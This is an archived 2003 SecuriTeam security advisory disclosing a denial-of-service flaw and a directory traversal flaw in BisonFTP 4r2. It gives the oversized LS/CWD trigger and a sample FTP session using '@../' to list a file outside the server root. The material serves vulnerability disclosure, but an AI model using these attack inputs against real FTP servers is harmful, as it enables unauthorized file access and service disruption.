[NT] Mulitple Vulnerabilities Found in BisonFTP (DoS, Directory Traversal @)

From: support@securiteam.com
Date: 02/17/03

  • Next message: support@securiteam.com: "[UNIX] CGI SAPI Security Vulnerability"
    From: support@securiteam.com
    To: list@securiteam.com
    Date: 17 Feb 2003 22:29:54 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Mulitple Vulnerabilities Found in BisonFTP (DoS, Directory Traversal @)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.bisonftp.com/> BisonFTP Server is a native Windows FTP
    Server. It offers all of the standard features other FTP Servers provide
    and includes such features as S/KEY Password, File Filtering, etc. Two
    security vulnerabilities have been found in the product allowing a remote
    attacker to cause it to no longer be able to respond to legitimate
    request, and to view files and directories that reside outside the
    bounding FTP root directory.

    DETAILS

    Vulnerable systems:
     * BisonFTP version 4r2

    Denial of service:
    BisonFTP is vulnerable to a DoS attack by sending ftp commands with big
    data. By sending the FTP command LS or CWD with 4300 bytes or more,
    BisonFTP will start 100% CPU usage until the socket is closed by the
    client.

    Directory Traversal:
    It is possible to trick BisonFTP into revealing confidential information
    about files outside ftp root.

        ftp> ls @../
        227 Entering PASV Mode (10,10,10,10,4,126)
        150 Directory List Follows
        -rwxrwxrwx 1 user group 739577 Feb 05 2002 BisonFTP42.exe
        226 Listing complete.
        ftp> mget @../Biso
        local: BisonFTP42.exe remote: BisonFTP42.exe
        227 Entering PASV Mode (10,10,10,10,4,128)
        550 File does not exist
        ftp>

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ja@immune.dk> Immune
    Advisory.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



    Relevant Pages

    • RE: Mitigate FTP
      ... Yes, using ssh/sftp will help; ... For your customer base, I assume they are mostly Windows users; ... Security may be able to fine tune the threshold accordingly. ... Subject: Mitigate FTP ...
      (Pen-Test)
    • [NT] Windows FTP Client Allows File Transfer Location Tampering (MS05-044)
      ... Get your security news from a reliable source. ... A tampering vulnerability exists in the Windows FTP client. ... * Microsoft Windows Server 2003 for Itanium-based Systems - ...
      (Securiteam)
    • [NEWS] Symantec Enterprise Firewall FTP Bounce Vulnerability (Patch Available)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Raptor Firewall FTP Bounce Vulnerability. ... PORT command referenced a destination that doesn't ...
      (Securiteam)
    • [UNIX] SafeTP Reveals Internal Server IP Addresses
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Protocol) to connect to their accounts on UNIX or NT/2000 FTP servers. ... check out the "227 Entering Passive Mode ... Timed out waiting for connection from server. ...
      (Securiteam)
    • RE:[fw-wiz] Vulnerability Scanners ( was: concerning ~el8 / project mayhem )
      ... >>access control should be in place that prevents FTP traffic ... >>w.x.y.z is running an FTP server and you can access it. ... One major provider with a foot in the security realm has had ... Of course doing that documentation would impact ...
      (Firewall-Wizards)